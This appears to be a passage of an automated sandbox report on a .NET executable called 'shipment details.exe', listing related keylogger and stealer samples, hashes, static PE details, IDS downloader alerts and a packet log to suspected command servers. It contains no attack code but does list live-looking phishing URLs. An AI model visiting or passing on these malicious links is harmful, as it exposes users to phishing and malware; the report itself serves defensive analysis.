api.telegram.org	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	JBybSK0HzG.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	05NN8zSK04.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	OYIZolitxJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	bYXVK2sdmF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AeOv2Ar7h5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	83pkjaRlqu.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	15PylGQjzK.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	Ji7kZhlqxz.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	JBybSK0HzG.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	05NN8zSK04.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	OYIZolitxJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	bYXVK2sdmF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	http://email-tracking.jotelulu.com/c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEOb	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://hnt.zkg.mybluehost.me/CA/LET	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://salesf54b.myportfolio.com/	Get hash	malicious	Unknown	Browse	104.21.30.116
	https://1drv.ms/w/c/3e7c84f1a590a3e6/IQStDJr3bMEwQZDK5oU6uNI1AXa25ZxVanY0bWjgRrRk-d4	Get hash	malicious	Unknown	Browse	104.18.36.155
	paymentremittanceinformationCQDM.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	E_receipt.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://ipfs.io/ipfs/QmNRP5R9QkxB8MVgk2kWzrmB6GoTVL3gcLheGnJuUDPaXv?filename=forme.html#jstubblefield@securustechnologies.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
ORACLE-BMC-31898US	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	FACTURAS 2024-665.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
	05NN8zSK04.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	OYIZolitxJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	bYXVK2sdmF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	AeOv2Ar7h5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAg	Get hash	malicious	Unknown	Browse	192.29.14.118

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	FACTURAS 2024-665.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	05NN8zSK04.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	OYIZolitxJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	bYXVK2sdmF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	AeOv2Ar7h5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	CXWCXZOzGM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	XDA_CDS v6.8.54_SE.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Y1ZqkGzvKm.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Y1ZqkGzvKm.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	E_receipt.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	EY10AIvC8B.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	EY10AIvC8B.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	92ZZIUHzPQ.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	JBybSK0HzG.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	05NN8zSK04.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	OYIZolitxJ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.795880347578578
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	shipment details.exe
File size:	488'448 bytes
MD5:	606686ad6a08ebe2cc694b5618cfaab5
SHA1:	06f5f2c91d2a4c7e02547ed997a4db3b92352971
SHA256:	f13526451639d7df1a8100047250b017cbfc065ce1271b6ffa30bc49de024d54
SHA512:	1cbbac0853eb1fe7913f8361cada0e2077c4c5e3be4375497af45f8216b49e9864eebfbbe917c2fd39e600c5f986bfd8cf15531bb63409fd6064a00ed7e5f923
SSDEEP:	12288:M/hv8C232ty/B1uj3K/Kq2oJqW5ZG+Ntt3GTl5klx:uI32tynuja/Kq2oJMQWlW
TLSH:	B9A4F18C7E985071CBF17FBDED7745D994B0094D0AA7AEB88A4733394A2007EB867706
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.................0..j............... ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4788be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x93CCF654 [Thu Jul 30 00:52:36 2048 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x78870	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7a000	0x586	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x768c4	0x76a00	9180c51e5d7aaccd299ab99f7a5e5eee	False	0.667353381849315	data	7.802547137134015	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x7a000	0x586	0x600	8ada3ce139cccc31ef726e74f50ce202	False	0.4134114583333333	data	4.033521752293894	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7c000	0xc	0x200	4dac309b04c7d448de873e9a75cbfcb5	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x7a0a0	0x2fc	data			0.43848167539267013
RT_MANIFEST	0x7a39c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T18:21:05.525980+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	158.101.44.242	80	TCP
2024-10-08T18:21:07.510383+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	158.101.44.242	80	TCP
2024-10-08T18:21:08.091215+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49709	188.114.97.3	443	TCP
2024-10-08T18:21:08.729084+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49710	158.101.44.242	80	TCP
2024-10-08T18:21:09.602566+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49711	188.114.97.3	443	TCP
2024-10-08T18:21:12.107618+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49717	188.114.97.3	443	TCP
2024-10-08T18:21:14.310424+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49719	188.114.97.3	443	TCP
2024-10-08T18:21:19.864976+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49725	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 18:21:04.705214024 CEST	49704	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:04.710787058 CEST	80	49704	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:04.710863113 CEST	49704	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:04.711076975 CEST	49704	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:04.716695070 CEST	80	49704	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:05.303951025 CEST	80	49704	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:05.308419943 CEST	49704	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:05.313448906 CEST	80	49704	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:05.475451946 CEST	80	49704	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:05.525979996 CEST	49704	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:05.526587009 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:05.526676893 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:05.530920982 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:05.535181046 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:05.535219908 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:06.026674032 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:06.026773930 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:06.044509888 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:06.044586897 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:06.044863939 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:06.088439941 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:06.177234888 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:06.223397017 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:06.290568113 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:06.290786982 CEST	443	49707	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:06.290880919 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:06.303925037 CEST	49707	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:06.308073997 CEST	49704	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:06.313513994 CEST	80	49704	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:07.465899944 CEST	80	49704	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:07.472021103 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:07.472070932 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:07.472141027 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:07.472527981 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:07.472543955 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:07.510382891 CEST	49704	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:07.941854000 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:07.945619106 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:07.945641994 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:08.091114998 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:08.091346025 CEST	443	49709	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:08.091593981 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:08.092055082 CEST	49709	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:08.096729040 CEST	49704	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:08.098229885 CEST	49710	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:08.102382898 CEST	80	49704	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:08.102471113 CEST	49704	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:08.103610992 CEST	80	49710	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:08.103709936 CEST	49710	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:08.103815079 CEST	49710	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:08.108691931 CEST	80	49710	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:08.685745001 CEST	80	49710	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:08.729084015 CEST	49710	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:08.730359077 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:08.730387926 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:08.730446100 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:08.731211901 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:08.731225967 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:09.198494911 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:09.200201035 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:09.200263977 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:09.602545977 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:09.602637053 CEST	443	49711	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:09.602696896 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:09.603255033 CEST	49711	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:09.608444929 CEST	49713	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:09.614036083 CEST	80	49713	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:09.614121914 CEST	49713	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:09.614213943 CEST	49713	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:09.619117975 CEST	80	49713	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:10.195403099 CEST	80	49713	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:10.196933985 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:10.196962118 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:10.197021008 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:10.197366953 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:10.197382927 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:10.244685888 CEST	49713	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:10.662523031 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:10.663961887 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:10.663994074 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:10.840635061 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:10.840850115 CEST	443	49715	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:10.840902090 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:10.841550112 CEST	49715	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:10.845222950 CEST	49713	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:10.846129894 CEST	49716	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:10.850946903 CEST	80	49713	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:10.851089954 CEST	80	49716	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:10.851136923 CEST	49713	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:10.851162910 CEST	49716	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:10.851270914 CEST	49716	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:10.856296062 CEST	80	49716	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:11.464623928 CEST	80	49716	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:11.465956926 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:11.466063976 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:11.466159105 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:11.466393948 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:11.466420889 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:11.510303974 CEST	49716	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:11.956882954 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:11.958406925 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:11.958456993 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:12.107431889 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:12.107522964 CEST	443	49717	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:12.107633114 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:12.108040094 CEST	49717	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:12.111613989 CEST	49716	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:12.112704992 CEST	49718	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:12.117541075 CEST	80	49716	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:12.117594004 CEST	49716	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:12.118336916 CEST	80	49718	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:12.118415117 CEST	49718	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:12.118496895 CEST	49718	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:12.124073029 CEST	80	49718	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:13.705847979 CEST	80	49718	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:13.707895994 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:13.707941055 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:13.708141088 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:13.708369017 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:13.708395958 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:13.760457993 CEST	49718	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:14.177417994 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:14.180536032 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:14.180558920 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:14.310419083 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:14.310698032 CEST	443	49719	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:14.310817003 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:14.311270952 CEST	49719	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:14.316106081 CEST	49718	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:14.317770004 CEST	49720	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:14.321490049 CEST	80	49718	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:14.321578979 CEST	49718	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:14.322865963 CEST	80	49720	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:14.322940111 CEST	49720	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:14.323060036 CEST	49720	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:14.328229904 CEST	80	49720	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:14.911712885 CEST	80	49720	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:14.913882971 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:14.913971901 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:14.914230108 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:14.914545059 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:14.914634943 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:14.963476896 CEST	49720	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:16.031490088 CEST	80	49720	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:16.031652927 CEST	49720	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:16.032113075 CEST	80	49720	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:16.032174110 CEST	49720	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:16.034037113 CEST	80	49720	158.101.44.242	192.168.2.5
Oct 8, 2024 18:21:16.034096956 CEST	49720	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:16.039086103 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:16.041349888 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:16.041380882 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:16.179574013 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:16.179831982 CEST	443	49721	188.114.97.3	192.168.2.5
Oct 8, 2024 18:21:16.179910898 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:16.180224895 CEST	49721	443	192.168.2.5	188.114.97.3
Oct 8, 2024 18:21:16.184192896 CEST	49720	80	192.168.2.5	158.101.44.242
Oct 8, 2024 18:21:16.185322046 CEST	49722	80	192.168.2.5	158.101.44.242
